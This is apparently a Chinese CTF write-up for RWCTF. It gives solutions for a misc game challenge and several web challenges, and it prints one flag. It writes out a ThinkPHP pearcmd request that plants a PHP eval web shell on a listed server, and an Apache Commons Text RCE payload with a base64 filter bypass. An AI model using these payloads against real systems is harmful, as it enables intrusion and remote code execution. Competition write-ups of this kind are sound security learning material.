文章目录
- misc
 - 🐑了拼🐑
 
- web
 - Evil MySQL Server
 - Be-a-Language-Expert
 - Be-a-Wiki-Hacker
 - Yummy Api
 - ApacheCommandText
 
misc
🐑了拼🐑
游戏类题目,直接打开js文件搜索rwctf,发现flag
 
rwctf{wellcome_to_the_rwctf!}
 
web
Evil MySQL Server
Mysql 服务器任意读取客户端文件
 使用rogue_mysql_server构造恶意mysql服务器
 工具地址如下:
 https://github.com/rmb122/rogue_mysql_server
 配置好文件后,启动服务器,然后客户端连接得到flag文件
 
 最后读取flag文件即可得到flag
Be-a-Language-Expert
thinkphp lang rce
 直接写shell
http://47.98.124.175:8080/?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=@eval($_POST['cmd']);?>+/tmp/shell.php
 

然后文件包含
 
执行命令反弹到vps,执行/readflag得到flag
Be-a-Wiki-Hacker
cve-2022-26134

Yummy Api
YApi 接口管理平台 up SQL注入到rce漏洞
 
ApacheCommandText
Apache Commons Text RCE(CVE-2022-42889)漏洞
 构造io流读取exec执行./readflag的内容
${script:javascript:new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("./readflag").getInputStream())).readLine()}
 
题目过滤了 file dns script url
 
使用base64Decoder进行绕过
${base64Decoder:JHtzY3JpcHQ6amF2YXNjcmlwdDpuZXcgamF2YS5pby5CdWZmZXJlZFJlYWRlcihuZXcgamF2YS5pby5JbnB1dFN0cmVhbVJlYWRlcihqYXZhLmxhbmcuUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiLi9yZWFkZmxhZyIpLmdldElucHV0U3RyZWFtKCkpKS5yZWFkTGluZSgpfQ==}
 

【他乡纵有当头月,不抵故乡一盏灯,年关将至,外乡人都早些回家】



















